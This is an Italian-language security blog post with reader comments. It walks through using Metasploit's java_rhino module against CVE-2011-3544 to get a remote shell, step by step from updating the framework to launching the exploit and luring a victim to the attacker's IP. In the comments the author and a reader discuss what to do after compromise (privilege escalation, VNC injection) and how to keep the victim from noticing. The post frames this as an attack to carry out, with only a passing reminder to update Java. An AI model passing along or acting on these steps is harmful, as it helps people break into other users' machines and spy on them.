ClsHack:Computer Security Blog    

[CVE-2011-3544]Metasploit: Java Remote untrusted Java Web Start

Posted on: 30 November 2011

Esistono da tempo i payload per metasploit che consentono di attivare un applet maligno che se fatto partire ci consente di aprirci una shell remota sul pc vittima.

La vulnerabilità siglata con CVE-2011-3544 consente di bypassare il controllo utente.

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.

Per metasploit è già uscito l’exploit :)
Per provarlo aggiorniamo metasploit:
msfupdate
Avviamo metasploit:
msfconsole

Cerchiamo l’exploit:
search CVE-2011-3544
Nel mio caso:
java_rhino
Il nome potrebbe cambiare ;)
Settiamo l’exploit:
use exploit/multi/browser/java_rhino
Per vedere le opzioni:
show options
Facciamo partire :D
exploit

Ora re-direzioniamo la vittima sul nostro ip e win :D

Se avete java v.v aggiornate ;)

Related posts:

  1. [Metasploit]Sun Java Web Start Plugin Remote Code Excution
  2. [DOS]CVE-2011-3192: Apache HTTPD Killer Remote Denial of Service
  3. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  4. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  5. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

This entry was posted on Wednesday, November 30th, 2011 at 2:03 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • aredvanrossum

    potresti darmi delle delucidazioni sulle potenzialità della shell sotto windows? Mi spiego meglio, sotto Linux, da shell ci amministri un sistema, ma sotto windows hai le stesse potenzialità della shell di Linux?

    ah per capire chi sono, sono quello alto biondo che hai conosciuto al joborienta che ti ha chiesto il nome del tuo blog, quello del sistema di domotica creato con Arduino :)

  • clshack_

    @aredvanrossum:
    Ciao :D

    Quando riesci ad aprirti una shell remota su un sistema windows hai la possibilità di fare praticamente tutto, le estensioni per i payload meterpreter sono semplici da usare e molto potenti puoi tentare un privilege escalation, iniettare vnc in due comandi, se non basta puoi caricare file eseguirli e aprirti altre shell magari con più privilegi :D
    Qualche appunto lo trovi anche qui qui:
    http://www.clshack.it/pdf-download-meterpreter-cheat-sheet.html

    http://www.clshack.it/metasploitaprire-una-sessione-vnc.html

    Buon divertimento :)

  • aredvanrossum

    Grazie clshack_,
    un’altra cosa ti volevo chiedere: quando faccio un inject di un server vnc, c’e’ un metodo per fare in modo che il computer attaccato non veda cosa sto facendo?
    Perchè tempo fa sfruttai una vulnerabilità di IE (quella dei files ani per interderci), e iniettai una vnc, ma vedevo che dell’altra parte si vedeva tutto quello che facevo :)

  • clshack_

    No praticamente si vede muovere il mouse XD
    Per questo è meglio usare la console ;)

  • aredvanrossum

    Grazie per le risposte ;) ^^ Buona Serata ^^